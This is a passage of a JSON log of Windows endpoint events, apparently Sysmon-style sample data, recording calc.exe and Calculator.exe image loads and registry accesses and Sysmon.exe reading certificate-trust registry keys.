"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573245730000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "image_load", - "image_name": "MrmCoreR.dll", - "image_path": "C:\\Windows\\System32\\MrmCoreR.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573246200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState\\Mode", - "registry_value": "Mode", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "process", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "subtype": "terminate", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "twinui.dll", - "image_path": "C:\\Windows\\System32\\twinui.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573246670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573246670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573246670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "twinui.appcore.dll", - "image_path": "C:\\Windows\\System32\\twinui.appcore.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573244960000, - "unique_pid": 